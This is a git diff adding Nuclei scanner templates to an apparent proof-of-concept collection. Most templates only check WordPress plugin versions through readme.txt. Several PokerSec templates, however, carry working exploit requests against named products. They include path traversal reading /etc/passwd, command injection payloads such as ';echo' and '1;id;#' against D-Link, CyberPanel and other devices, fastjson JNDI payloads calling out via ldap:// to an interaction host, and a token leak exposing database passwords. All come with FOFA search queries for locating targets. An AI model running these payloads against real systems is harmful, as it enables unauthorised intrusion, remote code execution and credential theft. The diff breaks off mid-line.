+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/visualmodo-elements/" + google-query: inurl:"/wp-content/plugins/visualmodo-elements/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,visualmodo-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visualmodo-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visualmodo-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/other/wangyuxingyun_vpn_client_filedownload.yaml b/poc/other/wangyuxingyun_vpn_client_filedownload.yaml new file mode 100644 index 0000000000..ba2d43083d --- /dev/null +++ b/poc/other/wangyuxingyun_vpn_client_filedownload.yaml @@ -0,0 +1,30 @@ +id: wangyuxingyun_vpn_client_filedownload + +info: + name: wangyuxingyun_vpn_client_filedownload + author: PokerSec + severity: high + metadata: + fofasearch: body="easSessionId" || header="easportal" + +http: + - raw: + - |+ + GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "appframe" + + - type: status + status: + - 200 diff --git a/poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml b/poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml new file mode 100644 index 0000000000..e2bec6a0c4 --- /dev/null +++ b/poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml @@ -0,0 +1,59 @@ +id: woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f + +info: + name: > + WooCommerce Cart Count Shortcode <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8373938c-060a-4579-a133-d25b4d065d36?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-cart-count-shortcode/" + google-query: inurl:"/wp-content/plugins/woo-cart-count-shortcode/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-cart-count-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-cart-count-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-cart-count-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/other/woo-product-excel-importer.yaml b/poc/other/woo-product-excel-importer.yaml new file mode 100644 index 0000000000..f4a60a6c64 --- /dev/null +++ b/poc/other/woo-product-excel-importer.yaml @@ -0,0 +1,59 @@ +id: woo-product-excel-importer-ca4c619b208bcba2a3262a03cfacdba5 + +info: + name: > + PHPSpreadsheet Library < 2.3.0 - XXE Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-product-excel-importer/" + google-query: inurl:"/wp-content/plugins/woo-product-excel-importer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-product-excel-importer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-product-excel-importer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-product-excel-importer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.9') \ No newline at end of file diff --git a/poc/other/wot-elementor-widgets.yaml b/poc/other/wot-elementor-widgets.yaml new file mode 100644 index 0000000000..dbd5cc6672 --- /dev/null +++ b/poc/other/wot-elementor-widgets.yaml @@ -0,0 +1,59 @@ +id: wot-elementor-widgets-674d9cfa695bad4d29fdb872785d2ffb + +info: + name: > + Wot Elementor Widgets <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fdb1314-5979-42bb-96dd-cc1648283c4e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wot-elementor-widgets/" + google-query: inurl:"/wp-content/plugins/wot-elementor-widgets/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wot-elementor-widgets,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wot-elementor-widgets/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wot-elementor-widgets" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml b/poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml new file mode 100644 index 0000000000..d7ea888e1a --- /dev/null +++ b/poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml @@ -0,0 +1,19 @@ +id: yongyou-BIP-getolapconnectionlist-infoleak + +info: + name: yongyou-BIP-getolapconnectionlist-infoleak + author: PokerSec + severity: critical + metadata: + fofasearch: body="用友BIP" && body="数据应用服务" + +http: + - raw: + - | + GET /bi/api/SemanticModel/GetOlapConnectionList/?token=e30fe47a-f33e-463e-bc4a-843957ca88dd_263720ea7e397482da220115cae828_1214162142339 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"Password","DatabaseName") \ No newline at end of file diff --git a/poc/other/yonyou-UFIDA-NC-download-fileread.yaml b/poc/other/yonyou-UFIDA-NC-download-fileread.yaml new file mode 100644 index 0000000000..7d6959560f --- /dev/null +++ b/poc/other/yonyou-UFIDA-NC-download-fileread.yaml @@ -0,0 +1,19 @@ +id: yonyou-UFIDA-NC-download-fileread + +info: + name: yonyou-UFIDA-NC-download-fileread + author: PokerSec + severity: high + metadata: + fofasearch: app="用友-UFIDA-NC" + +http: + - raw: + - |+ + GET /portal/pt/downCourseWare/download?fileName=../webapps/nc_web/WEB-INF/web.xml&pageId=login HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"xml","nc.bs.framework.server") diff --git a/poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml b/poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml new file mode 100644 index 0000000000..25e0c70b40 --- /dev/null +++ b/poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml @@ -0,0 +1,25 @@ +id: D-Link_DNS-320-account_mgr-rce + +info: + name: D-Link_DNS-320-account_mgr-rce + author: PokerSec + severity: critical + metadata: + fofasearch: app="D_Link-DNS-ShareCenter" +variables: + flag: "{{to_lower(rand_base(6))}}" +requests: + - raw: + - |+ + GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{flag}};%27 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{flag}}" + - type: status + status: + - 200 diff --git a/poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml b/poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml new file mode 100644 index 0000000000..8af342dcea --- /dev/null +++ b/poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml @@ -0,0 +1,25 @@ +id: D-Link_DNS-320-scan_dsk-rce + +info: + name: D-Link_DNS-320-scan_dsk-rce + author: PokerSec + severity: critical + metadata: + fofasearch: app="D_Link-DNS-ShareCenter" +variables: + flag: "{{to_lower(rand_base(6))}}" +requests: + - raw: + - |+ + GET /cgi-bin/scan_dsk.cgi?cmd=ScanDisk_run_e2fsck&f_dev=a;echo%20{{flag}}; HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{flag}}" + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/remote_code_execution/ar-for-woocommerce.yaml b/poc/remote_code_execution/ar-for-woocommerce.yaml new file mode 100644 index 0000000000..dcb60f9bf7 --- /dev/null +++ b/poc/remote_code_execution/ar-for-woocommerce.yaml @@ -0,0 +1,59 @@ +id: ar-for-woocommerce-c4de0b2f08459711f843283164b2de85 + +info: + name: > + AR For Woocommerce <= 6.2 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/48950965-f7da-42af-9f9a-4bf7fd33be45?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ar-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/ar-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ar-for-woocommerce,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ar-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ar-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2') \ No newline at end of file diff --git a/poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml b/poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml new file mode 100644 index 0000000000..9527fa8bbe --- /dev/null +++ b/poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml @@ -0,0 +1,24 @@ +id: cyberpanel-upgrademysqlstatus-rce + +info: + name: cyberpanel-upgrademysqlstatus-rce + author: PokerSec + severity: critical + metadata: + fofasearch: app="CyberPanel" + +http: + - raw: + - | + GET /dataBases/upgrademysqlstatus HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 + Content-Type: application/json + Connection: close + + {"statusfile":"1;id;#"} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"uid=") && contains_all(body,"gid=") \ No newline at end of file diff --git a/poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml b/poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml new file mode 100644 index 0000000000..0e182a7703 --- /dev/null +++ b/poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml @@ -0,0 +1,59 @@ +id: geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f + +info: + name: > + GeoDataSource Country Region DropDown <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c974726e-9371-40e5-8664-c12c8c06e5b9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/geodatasource-country-region-dropdown/" + google-query: inurl:"/wp-content/plugins/geodatasource-country-region-dropdown/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,geodatasource-country-region-dropdown,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/geodatasource-country-region-dropdown/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "geodatasource-country-region-dropdown" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml b/poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml new file mode 100644 index 0000000000..1abd80a6f3 --- /dev/null +++ b/poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml @@ -0,0 +1,22 @@ +id: hamlintek-ISS-7000-login_handler-rce + +info: + name: hamlintek-ISS-7000-login_handler-rce + author: PokerSec + severity: critical + metadata: + fofasearch: body="css/login_form_style-06.css" + +http: + - raw: + - | + POST /login_handler.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin;id;&uilng=3&button=%E7%99%BB%E5%85%A5&Signin= + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"uid=0") && contains_all(body,"gid=0") && contains_all(header,"ISS-7000 v2") diff --git a/poc/remote_code_execution/kingdee_eas_apputil_rce.yaml b/poc/remote_code_execution/kingdee_eas_apputil_rce.yaml new file mode 100644 index 0000000000..4939fbb5c3 --- /dev/null +++ b/poc/remote_code_execution/kingdee_eas_apputil_rce.yaml @@ -0,0 +1,20 @@ +id: kingdee_eas_apputil_rce + +info: + name: kingdee_eas_apputil_rce + author: PokerSec + severity: high + metadata: + fofasearch: body="/eassso/common/js" + +http: + - raw: + - |+ + GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22{{interactsh-url}}%22%7D%7D HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" diff --git a/poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml b/poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml new file mode 100644 index 0000000000..d9b18fc48f --- /dev/null +++ b/poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml @@ -0,0 +1,19 @@ +id: meite-crm-sync_emp_weixin-rce + +info: + name: meite-crm-sync_emp_weixin-rce + author: PokerSec + severity: critical + metadata: + fofasearch: body="/common/newlay/image/metacrm7_logo.png" +http: + - raw: + - | + GET /weixin/admin/sync_emp_weixin.jsp?emp_json=[{%22@type%22:%22[com.sun.rowset.JdbcRowSetImpl%22[{,%22dataSourceName%22:%22ldap://{{interactsh-url}}%22,%22autoCommit%22:true}] HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" \ No newline at end of file diff --git a/poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml b/poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml new file mode 100644 index 0000000000..b72218da7c --- /dev/null +++ b/poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml @@ -0,0 +1,59 @@ +id: min-and-max-quantity-for-woocommerce-0f5a6c102396442ad361086f6c37c680 + +info: + name: > + Minimum and Maximum Quantity for WooCommerce <= 2.0.0 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22738841-b25c-4519-9b94-e64a3fdf6cea?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/min-and-max-quantity-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/min-and-max-quantity-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,min-and-max-quantity-for-woocommerce,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/min-and-max-quantity-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "min-and-max-quantity-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/remote_code_execution/ni-woocommerce-order-export.yaml b/poc/remote_code_execution/ni-woocommerce-order-export.yaml new file mode 100644 index 0000000000..42447ce6d5 --- /dev/null +++ b/poc/remote_code_execution/ni-woocommerce-order-export.yaml @@ -0,0 +1,59 @@ +id: ni-woocommerce-order-export-bc1c0fd81e2a3ec59a3d7bcd78b83be3 + +info: + name: > + Ni WooCommerce Order Export <= 3.1.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/36510335-df4c-473d-8091-ba7e070525bf?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ni-woocommerce-order-export/" + google-query: inurl:"/wp-content/plugins/ni-woocommerce-order-export/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ni-woocommerce-order-export,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ni-woocommerce-order-export/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ni-woocommerce-order-export" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.6') \ No newline at end of file diff --git a/poc/remote_code_execution/prodigy-commerce.yaml b/poc/remote_code_execution/prodigy-commerce.yaml new file mode 100644 index 0000000000..7e395c5af4 --- /dev/null +++ b/poc/remote_code_execution/prodigy-commerce.yaml @@ -0,0 +1,59 @@ +id: prodigy-commerce-89dae14b2ed2d25b5a5c7aae20575f1c + +info: + name: > + Prodigy Commerce <= 3.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14b10f8e-37dd-4a34-87da-c09fdb8e09b3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/prodigy-commerce/" + google-query: inurl:"/wp-content/plugins/prodigy-commerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,prodigy-commerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/prodigy-commerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "prodigy-commerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.8') \ No newline at end of file diff --git a/poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml b/poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml new file mode 100644 index 0000000000..55dcf77504 --- /dev/null +++ b/poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml @@ -0,0 +1,33 @@ +id: tianrongxin-yunweishenji-synRequest-rce + +info: + name: tianrongxin-yunweishenji-synRequest-rce + author: PokerSec + severity: critical + metadata: + fofasearch: header="iam" && server="Apache-Coyote/" + +requests: + - raw: + - |- + POST /iam/synRequest.do;.login.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Length: 62 + Accept: application/json, text/javascript, */*; q=0.01 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + method=trace_route&w=1&ip=127.0.0.1|echo%2087261823612%3b&m=10 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '87261823612' + - type: status + status: + - 200 diff --git a/poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml b/poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml new file mode 100644 index 0000000000..60a2a811ad --- /dev/null +++ b/poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml @@ -0,0 +1,59 @@ +id: webd-woocommerce-product-excel-importer-bulk-edit-ca4c619b208bcba2a3262a03cfacdba5 + +info: + name: > + PHPSpreadsheet Library < 2.3.0 - XXE Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/" + google-query: inurl:"/wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,webd-woocommerce-product-excel-importer-bulk-edit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "webd-woocommerce-product-excel-importer-bulk-edit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.6') \ No newline at end of file diff --git a/poc/remote_code_execution/woocommerce-myparcel.yaml b/poc/remote_code_execution/woocommerce-myparcel.yaml new file mode 100644 index 0000000000..7b8cb962d0 --- /dev/null +++ b/poc/remote_code_execution/woocommerce-myparcel.yaml @@ -0,0 +1,59 @@ +id: woocommerce-myparcel-19ad14ddf207ea295ff49c75f6ba3023 + +info: + name: > + MyParcel <= 4.24.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6c85f2b-965d-477f-9d9a-4a3f315c4904?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce-myparcel/" + google-query: inurl:"/wp-content/plugins/woocommerce-myparcel/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce-myparcel,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-myparcel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-myparcel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.24.1') \ No newline at end of file diff --git a/poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml b/poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml new file mode 100644 index 0000000000..f5efadf10d --- /dev/null +++ b/poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml @@ -0,0 +1,59 @@ +id: my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79 + +info: + name: > + My IDX Home Search <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/my-idx-home-search/" + google-query: inurl:"/wp-content/plugins/my-idx-home-search/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,my-idx-home-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "my-idx-home-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml b/poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml new file mode 100644 index 0000000000..3a0aafa573 --- /dev/null +++ b/poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml @@ -0,0 +1,59 @@ +id: my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b + +info: + name: > + My IDX Home Search <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/my-idx-home-search/" + google-query: inurl:"/wp-content/plugins/my-idx-home-search/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,my-idx-home-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "my-idx-home-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml b/poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml new file mode 100644 index 0000000000..40163d028a --- /dev/null +++ b/poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11095-b0165142a699db32c27db406fb189dac + +info: + name: > + Visualmodo Elements <= 1.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Visualmodo Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11095 + metadata: + fofa-query: "wp-content/plugins/visualmodo-elements/" + google-query: inurl:"/wp-content/plugins/visualmodo-elements/" + shodan-query: 'vuln:CVE-2024-11095' + tags: cve,wordpress,wp-plugin,visualmodo-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visualmodo-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visualmodo-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, 